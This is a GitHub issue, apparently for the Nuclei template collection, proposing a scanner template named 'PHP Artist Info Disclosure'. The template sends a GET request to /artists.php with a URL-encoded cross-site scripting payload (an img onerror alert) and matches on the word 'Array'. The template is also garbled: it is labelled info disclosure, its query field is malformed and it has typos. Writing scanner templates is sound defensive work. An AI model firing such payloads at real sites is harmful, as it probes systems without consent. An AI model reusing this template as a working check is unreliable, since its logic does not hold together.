-
Notifications
You must be signed in to change notification settings - Fork 2.9k
Open
Labels
Description
Is there an existing template for this?
- I have searched the existing templates.
Nuclei Template
---
name: PHP Artist Info Disclosure
author: Garuda
severity: medium
requests:
- method: GET
path: /artists.php
query: artist:{{BaseURL}}%22%3E%3Cimg+src=x+onerror=alert(20)%3E
headers:
User-Agent: "{{UserAgent}}"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gaip, deflate, br
redirects: true
max-redirects: 3
matchers:
- type: word
words:
- Array
Relevant dumped responses
Anything else?
No response